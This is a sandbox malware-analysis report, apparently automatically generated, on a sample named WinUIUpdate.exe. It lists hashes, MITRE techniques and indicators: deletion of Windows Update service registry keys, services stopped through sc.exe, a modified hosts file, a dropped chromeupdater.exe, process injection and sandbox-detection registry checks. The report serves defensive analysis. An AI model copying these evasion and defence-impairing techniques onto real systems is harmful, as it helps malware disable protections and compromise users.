6320b40b4809bd711e6a50eebacce6ac51d3cbb92f84d467116f79489c668a04

Resubmissions

20-03-2023 12:07

230320-pad1ssfd7y 10

20-03-2023 09:30

230320-lgw86scg49 10

Analysis

max time kernel
267s
max time network
237s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
20-03-2023 12:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WinUIUpdate.exe
Size

3.7MB
MD5

b0a84e4330a9c00c57d3a3e7885f7946
SHA1

bfe5f9b94081c25827e2bc90bb39a8c701033519
SHA256

6320b40b4809bd711e6a50eebacce6ac51d3cbb92f84d467116f79489c668a04
SHA512

a2214e9f6ca3b9a1aa35e2dbe8d7439ee6958e20a2bdd520a9b29693b5d0eb930bd7d26b818aad5e032ca455eb879543598dcb72e06f69775b9877ac28e77a8f
SSDEEP

98304:xGUMWoCIILMDNCl6b54+TUyscvBDw4pn:AGosIslo46UF8

Score

10^/10

evasion

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe

Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs

description	pid	Process	procid_target
PID 4756 created 4040	4756	WerFault.exe	58
PID 1456 created 3912	1456	WerFault.exe	100
PID 320 created 1824	320	WerFault.exe	125
PID 3748 created 4192	3748	WerFault.exe	133

Suspicious use of NtCreateUserProcessOtherParentProcess 16 IoCs

description	pid	Process	procid_target
PID 4192 created 3148	4192	WinUIUpdate.exe	45
PID 4192 created 3148	4192	WinUIUpdate.exe	45
PID 4192 created 3148	4192	WinUIUpdate.exe	45
PID 4192 created 3148	4192	WinUIUpdate.exe	45
PID 4192 created 3148	4192	WinUIUpdate.exe	45
PID 1800 created 604	1800	powershell.EXE	3
PID 5032 created 4040	5032	svchost.exe	58
PID 5032 created 3912	5032	svchost.exe	100
PID 5032 created 4652	5032	svchost.exe	102
PID 5032 created 3912	5032	svchost.exe	100
PID 5032 created 2120	5032	svchost.exe	123
PID 5032 created 1824	5032	svchost.exe	125
PID 5032 created 1824	5032	svchost.exe	125
PID 5032 created 4872	5032	svchost.exe	128
PID 5032 created 4192	5032	svchost.exe	133
PID 5032 created 4192	5032	svchost.exe	133

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	WinUIUpdate.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Drops file in System32 directory 13 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	sysmon.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4192 set thread context of 5032	4192	WinUIUpdate.exe	90
PID 1800 set thread context of 2500	1800	powershell.EXE	95

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\chromeupdater.exe	WinUIUpdate.exe

Drops file in Windows directory 12 IoCs

description	ioc	Process
File created	C:\Windows\INF\netsstpa.PNF	svchost.exe
File created	C:\Windows\INF\netrasa.PNF	svchost.exe
File created	C:\Windows\rescache\_merged\3060194815\2825129510.pri	SystemSettings.exe
File created	C:\Windows\rescache\_merged\2717123927\3950266016.pri	Explorer.EXE
File opened for modification	C:\Windows\Debug\ESE.TXT	DllHost.exe
File created	C:\Windows\rescache\_merged\3060194815\2825129510.pri	RuntimeBroker.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	DllHost.exe
File created	C:\Windows\rescache\_merged\2717123927\3950266016.pri	ApplicationFrameHost.exe
File created	C:\Windows\rescache\_merged\2717123927\3950266016.pri	SystemSettings.exe
File created	C:\Windows\rescache\_merged\2717123927\3950266016.pri	RuntimeBroker.exe
File created	C:\Windows\rescache\_merged\1742034116\2462578334.pri	SystemSettings.exe
File created	C:\Windows\rescache\_merged\4129138312\2114356439.pri	RuntimeBroker.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2948	sc.exe
3756	sc.exe
4628	sc.exe
3652	sc.exe
4656	sc.exe

Program crash 12 IoCs

pid	pid_target	Process	procid_target
1136	4040	WerFault.exe	58
1208	4604	WerFault.exe	57
4756	4040	WerFault.exe	58
4716	3912	WerFault.exe	100
4876	4652	WerFault.exe	102
1456	3912	WerFault.exe	100
3108	2120	WerFault.exe	123
4520	1824	WerFault.exe	125
320	1824	WerFault.exe	125
4012	4872	WerFault.exe	128
4160	4192	WerFault.exe	133
3748	4192	WerFault.exe	133

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	SystemSettings.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002	svchost.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Modifies Internet Explorer settings 1 TTPs 5 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\cc176cd7_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\5 = 0b0000000000000000000000000000000000000000000000	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\cc176cd7_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\4 = 0420000000000000180000000000000000000000000000000000803f0000803f	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\cc176cd7_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\3 = 04000000000000000000803f000000000000000000000000	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	sysmon.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1679317701"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={0324A6DC-B1E9-4DA0-A3C9-1BF5FB29AA43}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	sysmon.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
